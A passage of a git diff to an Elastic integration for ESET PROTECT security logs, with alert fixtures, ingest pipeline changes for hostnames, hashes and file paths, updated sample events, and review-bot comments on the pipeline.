2, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T09:15:30.000Z", + "processname": "D:\\sw\\Environmental Manager\\EnvironmentalManagerService.exe", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 8813, + "threat_name": "JAVA/Exploit.CVE-2021-44228", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 09:15:30\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":8813,\"protocol\":\"TCP\",\"account\":\"NT AUTHORITY\\\\SYSTEM\",\"process_name\":\"D:\\\\sw\\\\Environmental Manager\\\\EnvironmentalManagerService.exe\",\"inbound\":true,\"threat_name\":\"JAVA/Exploit.CVE-2021-44228\",\"aggregate_count\":2}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "D:\\sw\\Environmental Manager\\EnvironmentalManagerService.exe", + "name": "EnvironmentalManagerService.exe" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + 
"ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "source": { + "ip": "192.168.9.254" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "JAVA/Exploit.CVE-2021-44228", + "provider": "ESET PROTECT", + "sightings": 2 + } + } + }, + { + "@timestamp": "2024-03-12T11:00:26.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 49677 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\SYSTEM", + "aggregate_count": 1, + "hostname": "machine4", + "inbound": true, + "ipv4": "1.128.0.5", + "is_handled": false, + "name": "Web threat", + "occured": "2024-03-12T11:00:26.000Z", + "processname": "C:\\Windows\\System32\\lsass.exe", + "protocol": "TCP", + "severity": "Fatal", + "source_address": "192.168.30.32", + "source_address_type": "IPv4", + "source_port": 37966, + "source_uuid": "c539dbdf-2063-477b-81d7-8081a6f7a080", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 49677, + "threat_name": "RPC/Exploit.CVE-2020-1472", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"1.128.0.5\",\"hostname\":\"machine4\",\"source_uuid\":\"c539dbdf-2063-477b-81d7-8081a6f7a080\",\"occured\":\"12-Mar-2024 11:00:26\",\"severity\":\"Fatal\",\"event\":\"Web threat\",\"source_address\":\"192.168.30.32\",\"source_address_type\":\"IPv4\",\"source_port\":37966,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":49677,\"protocol\":\"TCP\",\"account\":\"NT 
AUTHORITY\\\\SYSTEM\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"inbound\":true,\"threat_name\":\"RPC/Exploit.CVE-2020-1472\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "hostname": "machine4", + "id": "c539dbdf-2063-477b-81d7-8081a6f7a080", + "ip": [ + "1.128.0.5" + ], + "name": "machine4" + }, + "message": "Web threat", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "C:\\Windows\\System32\\lsass.exe", + "name": "lsass.exe" + }, + "related": { + "hosts": [ + "machine4", + "c539dbdf-2063-477b-81d7-8081a6f7a080" + ], + "ip": [ + "1.128.0.5", + "192.168.30.32" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "source": { + "ip": "192.168.30.32", + "port": 37966 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "RPC/Exploit.CVE-2020-1472", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-11T05:56:58.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "action_taken": "Cleaned by deleting", + "circumstances": "Event occurred during an attempt to access the file.", + "engine_version": "28873 (20240310)", + "firstseen": "2021-07-28T07:20:55.000Z", + "hash": "1A45EBA0F9EF909E6F3C87B0D5CEDAD27BDB6CF2", + "hostname": "machine5", + "ipv4": "192.168.30.31", + "is_handled": false, + "need_restart": false, + "object_type": "File", + "object_uri": "file:///E:/Removable Drive (1GB).lnk", + "occured": "2024-03-11T05:56:58.000Z", + "processname": "C:\\Windows\\explorer.exe", + "scan_id": "virlog.dat", + "scanner_id": "Real-time file system protection", + "severity": "Warning", + "source_uuid": "f193d96b-cbd8-4402-94fc-6993efc30b11", + "threat_handled": true, + "threat_name": "LNK/Agent.BZ", + "threat_type": "Trojan", + "type": "Threat_Event", + "username": "machine5\\Administrator" + } + }, + "event": { + "action": "cleaned-by-deleting", + 
"category": [ + "threat" + ], + "kind": "alert", + "original": "{\"event_type\":\"Threat_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine5\",\"source_uuid\":\"f193d96b-cbd8-4402-94fc-6993efc30b11\",\"occured\":\"11-Mar-2024 05:56:58\",\"severity\":\"Warning\",\"threat_type\":\"Trojan\",\"threat_name\":\"LNK/Agent.BZ\",\"scanner_id\":\"Real-time file system protection\",\"scan_id\":\"virlog.dat\",\"engine_version\":\"28873 (20240310)\",\"object_type\":\"File\",\"object_uri\":\"file:///E:/Removable Drive (1GB).lnk\",\"action_taken\":\"Cleaned by deleting\",\"threat_handled\":true,\"need_restart\":false,\"username\":\"machine5\\\\Administrator\",\"processname\":\"C:\\\\Windows\\\\explorer.exe\",\"circumstances\":\"Event occurred during an attempt to access the file.\",\"firstseen\":\"28-Jul-2021 07:20:55\",\"hash\":\"1A45EBA0F9EF909E6F3C87B0D5CEDAD27BDB6CF2\"}", + "reason": "Event occurred during an attempt to access the file.", + "type": [ + "indicator" + ] + }, + "file": { + "directory": "/", + "drive_letter": "E", + "name": "Removable Drive (1GB).lnk", + "path": "E:/Removable Drive (1GB).lnk", + "type": "file", + "hash": { + "sha1": "1a45eba0f9ef909e6f3c87b0d5cedad27bdb6cf2" + } + }, + "host": { + "hostname": "machine5", + "id": "f193d96b-cbd8-4402-94fc-6993efc30b11", + "ip": [ + "192.168.30.31" + ], + "name": "machine5" + }, + "process": { + "executable": "C:\\Windows\\explorer.exe", + "name": "explorer.exe" + }, + "related": { + "hash": [ + "1a45eba0f9ef909e6f3c87b0d5cedad27bdb6cf2" + ], + "hosts": [ + "machine5", + "f193d96b-cbd8-4402-94fc-6993efc30b11" + ], + "ip": [ + "192.168.30.31" + ], + "user": [ + "Administrator" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "file": { + "hash": { + "sha1": "1a45eba0f9ef909e6f3c87b0d5cedad27bdb6cf2" + } + }, + "first_seen": "2021-07-28T07:20:55.000Z", + "name": "LNK/Agent.BZ", + "provider": "ESET PROTECT", + "type": "file" + } + }, + 
"user": { + "domain": "machine5", + "name": "Administrator" + } + }, + { + "@timestamp": "2024-03-27T09:54:20.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "action_taken": "Blocked", + "engine_version": "28962 (20240327)", + "group_name": "All", + "hash": "22B9B35A804A7A3739CBD007E00959075AECF0FC", + "hostname": "kate-ebademo", + "ipv4": "192.168.112.128", + "is_handled": false, + "need_restart": false, + "object_type": "File", + "object_uri": "script", + "occured": "2024-03-27T09:54:20.000Z", + "os_name": "Microsoft Windows 11 Pro", + "processname": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.22621.1", + "scan_id": "virlog.dat", + "scanner_id": "Script scanner", + "severity": "Warning", + "source_uuid": "16b429cb-c064-4a31-98ba-62fff54f0c96", + "threat_handled": true, + "threat_name": "VBS/TrojanDownloader.Agent.YUI", + "threat_type": "Trojan", + "type": "Threat_Event", + "username": "KATE-EBADEMO\\Kate" + } + }, + "event": { + "action": "blocked", + "category": [ + "threat" + ], + "kind": "alert", + "original": "{\"event_type\":\"Threat_Event\",\"ipv4\":\"192.168.112.128\",\"ipv6\":\"\",\"hostname\":\"kate-ebademo\",\"source_uuid\":\"16b429cb-c064-4a31-98ba-62fff54f0c96\",\"os_name\":\"Microsoft Windows 11 Pro\",\"occured\":\"27-Mar-2024 09:54:20\",\"group_name\":\"All\",\"group_description\":\"\",\"severity\":\"Warning\",\"threat_type\":\"Trojan\",\"threat_name\":\"VBS\\/TrojanDownloader.Agent.YUI\",\"threat_flags\":\"\",\"scanner_id\":\"Script scanner\",\"scan_id\":\"virlog.dat\",\"engine_version\":\"28962 
(20240327)\",\"object_type\":\"File\",\"object_uri\":\"script\",\"action_taken\":\"Blocked\",\"action_error\":\"\",\"threat_handled\":\"true\",\"need_restart\":\"false\",\"username\":\"KATE-EBADEMO\\\\Kate\",\"processname\":\"PowerShell_C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe_10.0.22621.1\",\"circumstances\":\"\",\"firstseen\":\"\",\"hash\":\"22B9B35A804A7A3739CBD007E00959075AECF0FC\"}", + "type": [ + "indicator" + ] + }, + "file": { + "path": "script", + "type": "file", + "hash": { + "sha1": "22b9b35a804a7a3739cbd007e00959075aecf0fc" + } + }, + "group": { + "name": "All" + }, + "host": { + "hostname": "kate-ebademo", + "id": "16b429cb-c064-4a31-98ba-62fff54f0c96", + "ip": [ + "192.168.112.128" + ], + "name": "kate-ebademo", + "os": { + "name": "Microsoft Windows 11 Pro" + } + }, + "process": { + "executable": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.22621.1", + "name": "powershell.exe_10.0.22621.1" + }, + "related": { + "hash": [ + "22b9b35a804a7a3739cbd007e00959075aecf0fc" + ], + "hosts": [ + "kate-ebademo", + "16b429cb-c064-4a31-98ba-62fff54f0c96" + ], + "ip": [ + "192.168.112.128" + ], + "user": [ + "Kate" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "file": { + "hash": { + "sha1": "22b9b35a804a7a3739cbd007e00959075aecf0fc" + } + }, + "name": "VBS/TrojanDownloader.Agent.YUI", + "provider": "ESET PROTECT", + "type": "file" + } + }, + "user": { + "domain": "KATE-EBADEMO", + "name": "Kate" + } } ] } \ No newline at end of file diff --git a/packages/eset_protect/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/eset_protect/data_stream/event/elasticsearch/ingest_pipeline/default.yml index 89d56984ec3..d8f4310126a 100644 --- a/packages/eset_protect/data_stream/event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/eset_protect/data_stream/event/elasticsearch/ingest_pipeline/default.yml 
@@ -80,16 +80,37 @@ processors:
target_field: eset_protect.event.hostname
ignore_missing: true
- set:
- field: host.hostname
- tag: set_host_hostname_from_event_hostname
+ field: host.name
+ tag: set_host_name_from_event_hostname
copy_from: eset_protect.event.hostname
- ignore_empty_value: true
+ if: ctx.eset_protect?.event?.hostname?.contains('.') == true
+ - grok:
+ field: eset_protect.event.hostname
+ tag: grok_host_hostname_and_domain_from_event_hostname
+ patterns:
+ - '(%{DATA:host.hostname}\.%{GREEDYDATA:host.domain}|%{GREEDYDATA:host.hostname})'
+ if: ctx.eset_protect?.event?.hostname != null
+ - set:
+ field: host.name
+ tag: set_host_name_from_host_hostname
+ copy_from: host.hostname
+ if: ctx.host?.hostname != null && ctx.host.name == null
+ - lowercase:
+ field: host.name
+ tag: lowercase_host_name
+ ignore_missing: true
+ - append:
+ field: related.hosts
+ tag: append_host_name_into_related_hosts
+ value: "{{{host.name}}}"
+ allow_duplicates: false
+ if: ctx.host?.name != null
- append:
field: related.hosts
tag: append_hostname_into_related_hosts
- value: "{{{eset_protect.event.hostname}}}"
+ value: "{{{host.hostname}}}"
allow_duplicates: false
- if: ctx.eset_protect?.event?.hostname != null
+ if: ctx.host?.hostname != null
- convert:
field: json.ipv4
tag: convert_ipv4_to_ip
@@ -193,12 +214,6 @@ processors:
tag: set_threat_indicator_provider
value: ESET PROTECT
if: ctx.eset_protect?.event?.type != null && ['Threat_Event','HipsAggregated_Event','FirewallAggregated_Event','FilteredWebsites_Event','BlockedFiles_Event'].contains(ctx.eset_protect.event.type)
- - set:
- field: threat.indicator.file.hash.sha1
- tag: set_threat_indicator_file_hash_sha1
- copy_from: json.hash
- ignore_empty_value: true
- if: ctx.eset_protect?.event?.type == 'BlockedFiles_Event' || ctx.json?.object_type?.toLowerCase() == 'file'
- set:
field: threat.indicator.type
tag: set_threat_indicator_type
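Review bot: `host.name` is lowercased (tag `lowercase_host_name`) but `host.hostname`, which the grok fills from the same source value, is not, and both are appended to `related.hosts`; for a dot-less hostname that arrives in upper or mixed case this leaves two spellings of the same host in `related.hosts` (`allow_duplicates: false` compares exact strings), so an analyst pivoting on the host needs two search terms. Either put a `lowercase` processor on `host.hostname` (tag `lowercase_host_hostname`, `ignore_missing: true`) ahead of `append_hostname_into_related_hosts`, or drop that second append and let `append_host_name_into_related_hosts` carry the normalized value. The grok's fallback alternative `%{GREEDYDATA:host.hostname}` always matches, so that processor needs no `on_failure`. The `processors:` list continues on both sides of the hunk.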
@@ -413,13 +428,33 @@ processors:
tag: rename_hash
target_field: eset_protect.event.hash
ignore_missing: true
+ - set:
+ field: file.hash.sha1
+ tag: set_file_hash_sha1_from_eset_protect_event_hash
+ copy_from: eset_protect.event.hash
+ ignore_empty_value: true
+ if: ctx.eset_protect?.event?.type == 'BlockedFiles_Event' || 'file'.equalsIgnoreCase(ctx.json?.object_type)
+ - lowercase:
+ field: file.hash.sha1
+ tag: lowercase_file_hash_sha1
+ ignore_missing: true
+ - set:
+ field: threat.indicator.file.hash.sha1
+ tag: set_threat_indicator_file_hash_sha1
+ copy_from: file.hash.sha1
+ ignore_empty_value: true
+ if: ctx.eset_protect?.event?.type == 'BlockedFiles_Event' || 'file'.equalsIgnoreCase(ctx.json?.object_type)
- append:
field: related.hash
- tag: append_hash_into_related_hash
+ tag: append_eset_protect_event_hash_into_related_hash
value: "{{{eset_protect.event.hash}}}"
allow_duplicates: false
if: ctx.eset_protect?.event?.hash != null
- - convert:
+ - lowercase:
+ field: related.hash
+ tag: lowercase_file_hash_sha1
+ ignore_missing: true
+ - convert:
field: json.inbound
tag: convert_inbound_to_boolean
target_field: eset_protect.event.inbound
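Review bot: The new `lowercase` processor on `related.hash` reuses the tag `lowercase_file_hash_sha1` that the `file.hash.sha1` lowercase four entries above already carries, so a failure message or a `_simulate?verbose` trace cannot tell the two apart; give it its own tag, `tag: lowercase_related_hash`. Both new `set` processors hard-wire the vendor hash into the `sha1` slot; the fixtures in this commit are all 40 hex characters, but if ESET PROTECT can emit another digest type the condition should also check the length before populating `file.hash.sha1` and `threat.indicator.file.hash.sha1`, which is worth confirming against the vendor's event schema. Lowercasing the hashes is the right call for correlation, since the fixtures show the source emitting them in upper case while ECS consumers expect lower case.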
@@ -449,11 +484,29 @@ processors:
tag: rename_object_type
target_field: eset_protect.event.object_type
ignore_missing: true
+ - set:
+ field: file.type
+ value: file
+ tag: set_file_type_file
+ if: ctx.eset_protect?.event?.object_type?.toLowerCase() == 'file'
- rename:
field: json.object_uri
tag: rename_object_uri
target_field: eset_protect.event.object_uri
ignore_missing: true
+ - set:
+ field: file.path
+ if: "ctx.eset_protect?.event?.object_uri != null && ctx.eset_protect?.event?.object_type?.toLowerCase() == 'file'"
+ copy_from: eset_protect.event.object_uri
+ - grok:
+ field: file.path
+ tag: grok_file_path
+ patterns:
+ - '^(file:///)?%{FILEPATH:file.path}$'
+ - '.*/(?.+\.(?.+))$'
+ pattern_definitions:
+ FILEPATH: '(?\w):(?/.*/|/)?(?.+(\.(?.+))?)?'
+ if: ctx.file?.path != null && ctx.file?.path != 'script'
- rename:
field: json.operation
tag: rename_operation
@@ -480,8 +533,8 @@ processors:
ignore_missing: true
patterns:
- '^%{GREEDYDATA:json._temp}\\%{DATA:process.name}$'
- - "^%{GREEDYDATA:json._temp}/%{DATA:process.name}$"
- - "^%{DATA:process.name}$"
+ - '^%{GREEDYDATA:json._temp}/%{DATA:process.name}$'
+ - '^%{DATA:process.name}$'
if: ctx.eset_protect?.event?.processname != ''
on_failure:
- append:
@@ -752,8 +805,8 @@ processors:
patterns:
- '^%{HOSTNAME:user.domain}\\%{USERNAME:user.name}$'
- '^%{HOSTNAME:user.domain}\\\\%{USERNAME:user.name}$'
- - "^%{USERNAME:user.name}@%{HOSTNAME:user.domain}$"
- - "^%{GREEDYDATA:user.name}$"
+ - '^%{USERNAME:user.name}@%{HOSTNAME:user.domain}$'
+ - '^%{GREEDYDATA:user.name}$'
if: ctx.eset_protect?.event?.username != ''
on_failure:
- append:
diff --git a/packages/eset_protect/data_stream/event/sample_event.json b/packages/eset_protect/data_stream/event/sample_event.json
index 4cb659360c7..1232a4204f8 100644
--- a/packages/eset_protect/data_stream/event/sample_event.json
+++ b/packages/eset_protect/data_stream/event/sample_event.json
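Review bot: The new `grok_file_path` processor has neither `on_failure` nor `ignore_failure`, unlike the sibling grok in the `@@ -480` hunk on this same line, which appends to `error.message` on failure; a `file.path` that matches neither pattern (a UNC path, or a non-Windows path with no extension) would fail the document or, if one exists outside the hunk, fall through to a pipeline-level `on_failure`, and the hard-coded `!= 'script'` guard shows one such value was already hit. Give it the same `on_failure` handler as the other groks, or `ignore_failure: true`, so the raw `file.path` is kept and the event still indexes. The `set` that populates `file.path` is the only processor in these hunks without a `tag`; `tag: set_file_path_from_event_object_uri` keeps it traceable in failure output. Separately, the named groups in the second pattern and in `FILEPATH` render here as `(?.+` — presumably `(?<file.name>…)` with the bracketed names lost in display; if the file literally reads this way the patterns will not compile, so check the committed text.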
@@ -1,11 +1,11 @@ { "@timestamp": "2021-06-21T03:56:20.000Z", "agent": { - "ephemeral_id": "677639c3-b8cb-4791-bd2d-a6f2c144f964", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "c8765a56-3694-4bf7-aada-7f979a9581cd", + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.12.0" + "version": "8.12.2" }, "data_stream": { "dataset": "eset_protect.event", @@ -37,9 +37,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, - "version": "8.12.0" + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", + "snapshot": false, + "version": "8.12.2" }, "eset_protect": { "event": { @@ -72,7 +72,7 @@ "web" ], "dataset": "eset_protect.event", - "ingested": "2024-01-04T10:10:20Z", + "ingested": "2024-03-27T16:01:32Z", "kind": "alert", "original": "{\"event_type\":\"FilteredWebsites_Event\",\"ipv4\":\"192.168.30.30\",\"hostname\":\"win-test\",\"group_name\":\"All/Lost & found\",\"os_name\":\"Microsoft Windows 11 Pro\",\"group_description\":\"Lost & found static group\",\"source_uuid\":\"d9477661-8fa4-4144-b8d4-e37b983bcd69\",\"occured\":\"21-Jun-2021 03:56:20\",\"severity\":\"Warning\",\"event\":\"An attempt to connect to URL\",\"target_address\":\"89.160.20.128\",\"target_address_type\":\"IPv4\",\"scanner_id\":\"HTTP filter\",\"action_taken\":\"blocked\",\"object_uri\":\"https://test.com\",\"hash\":\"ABCDAA625E6961037B8904E113FD0C232A7D0EDC\",\"username\":\"WIN-TEST\\\\Administrator\",\"processname\":\"C:\\\\Program Files\\\\Web browser\\\\brwser.exe\",\"rule_id\":\"Blocked by PUA blacklist\"}", "type": [ @@ -88,6 +88,7 @@ "ip": [ "192.168.30.30" ], + "name": "win-test", "os": { "name": "Microsoft Windows 11 Pro" } @@ -97,7 +98,7 @@ }, "log": { "source": { - "address": "192.168.64.8:46716" + "address": "172.19.0.11:48112" }, "syslog": { "appname": "ERAServer", 
@@ -121,7 +122,7 @@ }, "related": { "hash": [ - "ABCDAA625E6961037B8904E113FD0C232A7D0EDC" + "abcdaa625e6961037b8904e113fd0c232a7d0edc" ], "hosts": [ "win-test", diff --git a/packages/eset_protect/docs/README.md b/packages/eset_protect/docs/README.md index 861c8cd3507..632fb441083 100644 --- a/packages/eset_protect/docs/README.md +++ b/packages/eset_protect/docs/README.md @@ -77,8 +77,8 @@ An example event for `detection` looks as following: { "@timestamp": "2023-10-26T13:36:53.000Z", "agent": { - "ephemeral_id": "eaf0a213-9722-4532-9223-51619c3f6c91", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "96cc7ee0-ede2-46a4-9b0e-4104dead04cc", + "id": "78166295-0693-4726-a27f-cd8722896c22", "name": "docker-fleet-agent", "type": "filebeat", "version": "8.12.0" @@ -114,8 +114,8 @@ An example event for `detection` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, + "id": "78166295-0693-4726-a27f-cd8722896c22", + "snapshot": false, "version": "8.12.0" }, "eset_protect": { 
@@ -151,7 +151,7 @@ An example event for `detection` looks as following: "intrusion_detection" ], "dataset": "eset_protect.detection", - "ingested": "2024-01-04T10:08:34Z", + "ingested": "2024-03-18T21:48:09Z", "kind": "alert", "original": "{\"category\":\"DETECTION_CATEGORY_NETWORK_INTRUSION\",\"context\":{\"circumstances\":\"Eicar\",\"deviceUuid\":\"xxx-xxxx-1234-5678-xxxxxxxxxxxx\",\"process\":{\"path\":\"C:\\\\Windows\\\\chrome.exe\"},\"userName\":\"testingpc\\\\example\"},\"networkCommunication\":{\"protocolName\":\"0\",\"remoteIpAddress\":\"89.160.20.112\",\"remotePort\":443},\"objectHashSha1\":\"AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D\",\"objectTypeName\":\"File\",\"objectUrl\":\"C:\\\\Temp\\\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8\",\"occurTime\":\"2023-10-26T13:36:53Z\",\"responses\":[{}],\"severityLevel\":\"SEVERITY_LEVEL_MEDIUM\",\"typeName\":\"TCP Port scanning attack\",\"uuid\":\"xxx-xxxx-xxxx-1234-xxxxxxxxxxxx\"}", "type": [ @@ -160,7 +160,7 @@ An example event for `detection` looks as following: }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" } }, "host": { @@ -181,7 +181,7 @@ An example event for `detection` looks as following: }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" ], "hosts": [ "xxx-xxxx-1234-5678-xxxxxxxxxxxx" 
@@ -265,13 +265,13 @@ An example event for `device_task` looks as following: ```json { - "@timestamp": "2024-01-04T10:09:14.915Z", + "@timestamp": "2024-03-27T16:00:29.582Z", "agent": { - "ephemeral_id": "3873a5a6-ab80-4d05-b35a-e91aa4c7f86e", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "c5a8ca66-614e-438e-b69a-9e12cb12aa7d", + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.12.0" + "version": "8.12.2" }, "data_stream": { "dataset": "eset_protect.device_task", @@ -282,9 +282,9 @@ An example event for `device_task` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, - "version": "8.12.0" + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", + "snapshot": false, + "version": "8.12.2" }, "eset_protect": { "device_task": { @@ -324,7 +324,7 @@ An example event for `device_task` looks as following: "action": "Shutdown computer", "agent_id_status": "verified", "dataset": "eset_protect.device_task", - "ingested": "2024-01-04T10:09:26Z", + "ingested": "2024-03-27T16:00:39Z", "kind": "event", "original": "{\"action\":{\"name\":\"Shutdown computer\",\"params\":{\"@type\":\"type.googleapis.com/Era.Common.DataDefinition.Task.ESS.OnDemandScan\",\"cleaningEnabled\":true,\"customProfileName\":\"DefaultProfile\",\"scanProfile\":\"InDepth\",\"scanTargets\":[\"eset://AllTargets\"]}},\"description\":\"Automatically created via context menu\",\"displayName\":\"Reboot Computer - via context menu\",\"targets\":{\"devicesUuids\":[\"0205321e-XXXX-XXXX-1234-feeb35010ea7\",\"0205321e-XXXX-XXXX-5678-feeb35010ea7\",\"0205321e-XXXX-1234-5678-feeb35010ea7\"]},\"triggers\":[{\"manual\":{\"expireTime\":\"2023-12-01T01:30:00Z\"}}],\"uuid\":\"c93070e0-XXXX-1234-5678-c48f0e5e0b7e\",\"versionId\":\"1511\"}", "type": [ 
@@ -401,11 +401,11 @@ An example event for `event` looks as following: { "@timestamp": "2021-06-21T03:56:20.000Z", "agent": { - "ephemeral_id": "677639c3-b8cb-4791-bd2d-a6f2c144f964", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "c8765a56-3694-4bf7-aada-7f979a9581cd", + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.12.0" + "version": "8.12.2" }, "data_stream": { "dataset": "eset_protect.event", @@ -437,9 +437,9 @@ An example event for `event` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, - "version": "8.12.0" + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", + "snapshot": false, + "version": "8.12.2" }, "eset_protect": { "event": { @@ -472,7 +472,7 @@ An example event for `event` looks as following: "web" ], "dataset": "eset_protect.event", - "ingested": "2024-01-04T10:10:20Z", + "ingested": "2024-03-27T16:01:32Z", "kind": "alert", "original": "{\"event_type\":\"FilteredWebsites_Event\",\"ipv4\":\"192.168.30.30\",\"hostname\":\"win-test\",\"group_name\":\"All/Lost & found\",\"os_name\":\"Microsoft Windows 11 Pro\",\"group_description\":\"Lost & found static group\",\"source_uuid\":\"d9477661-8fa4-4144-b8d4-e37b983bcd69\",\"occured\":\"21-Jun-2021 03:56:20\",\"severity\":\"Warning\",\"event\":\"An attempt to connect to URL\",\"target_address\":\"89.160.20.128\",\"target_address_type\":\"IPv4\",\"scanner_id\":\"HTTP filter\",\"action_taken\":\"blocked\",\"object_uri\":\"https://test.com\",\"hash\":\"ABCDAA625E6961037B8904E113FD0C232A7D0EDC\",\"username\":\"WIN-TEST\\\\Administrator\",\"processname\":\"C:\\\\Program Files\\\\Web browser\\\\brwser.exe\",\"rule_id\":\"Blocked by PUA blacklist\"}", "type": [ @@ -488,6 +488,7 @@ An example event for `event` looks as following: "ip": [ "192.168.30.30" ], + "name": "win-test", "os": { "name": "Microsoft Windows 11 Pro" } 
@@ -497,7 +498,7 @@ An example event for `event` looks as following: }, "log": { "source": { - "address": "192.168.64.8:46716" + "address": "172.19.0.11:48112" }, "syslog": { "appname": "ERAServer", @@ -521,7 +522,7 @@ An example event for `event` looks as following: }, "related": { "hash": [ - "ABCDAA625E6961037B8904E113FD0C232A7D0EDC" + "abcdaa625e6961037b8904e113fd0c232a7d0edc" ], "hosts": [ "win-test", diff --git a/packages/eset_protect/manifest.yml b/packages/eset_protect/manifest.yml index 4e27eefc225..ca754af2d8f 100644 --- a/packages/eset_protect/manifest.yml +++ b/packages/eset_protect/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.1 +format_version: 3.0.3 name: eset_protect title: ESET PROTECT -version: 0.1.1 +version: 0.4.0 description: Collect logs from ESET PROTECT with Elastic Agent. type: integration categories: @@ -61,6 +61,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: enable_request_tracer type: bool title: Enable request tracing diff --git a/packages/etcd/_dev/build/docs/README.md b/packages/etcd/_dev/build/docs/README.md index f24e3656cfc..eab8ce3774c 100644 --- a/packages/etcd/_dev/build/docs/README.md +++ b/packages/etcd/_dev/build/docs/README.md 
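Review bot: `secret: true` is added in the `@@ -61` hunk to a variable whose `name:` line sits above the hunk, but none of this manifest's hunks show `conditions.kibana.version` being raised; as far as I know Kibana only moves `secret` vars into its secret store from 8.12.0 and the package spec rejects `secret: true` under a constraint that still admits older versions, so confirm the constraint, as the f5_bigip manifest in this same commit pairs its `secret: true` additions with `version: ^8.12.0`. If the constraint already excludes pre-8.12 versions, nothing more is needed here.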
